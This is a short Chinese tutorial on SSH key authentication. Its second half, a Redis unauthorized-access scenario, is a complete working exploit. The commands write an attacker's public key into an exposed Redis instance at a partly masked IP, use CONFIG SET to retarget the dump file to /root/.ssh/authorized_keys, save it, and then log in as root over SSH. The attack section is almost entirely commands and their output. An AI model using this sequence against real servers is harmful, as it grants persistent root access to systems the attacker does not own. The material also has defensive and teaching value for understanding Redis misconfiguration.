密钥认证机制
创建存放key的文件
1)创建目录 /root/.ssh 并设置权限
[root@localhost ~]# mkdir /root/.ssh mkdir 命令用来创建目录,以后会详细介绍,暂时只了解即可。
[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用来修改文件属性权限的,以后会详细介绍。
2)创建文件 / root/.ssh/authorized_keys
[root@localhost ~]# vim /root/.ssh/authorized_keys
生成Key
Xshell-【新建用户密钥生成向导】,密钥类型选择RSA,密钥长度选择2048位,生成密钥名称,加密的密码。
复制生成的公钥到远程linux里面 /root/.ssh/authorized_keys 文件中。如果没有.ssh目录,就自行建立,并更改目录权限为700。粘贴公钥的内容,保存退出。
就可以利用密钥登录了
漏洞场景-redis未授权访问漏洞
1)本地生成秘钥
root@XXX:~# ssh-keygen -t rsa
2)将公钥写入一个文件
root@XXX:~# cd /root/.ssh/
root@XXX:~/.ssh# (echo -e "
"; cat id_rsa.pub; echo -e "
") > foo.txt
3)连接redis写入文件
root@XXX:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit
OK
root@XXX:~/.ssh# redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@XXX:~/.ssh# ssh
4)连接服务器
root@XXX:~/.ssh# ssh -i id_rsa root@210.73.90.xxx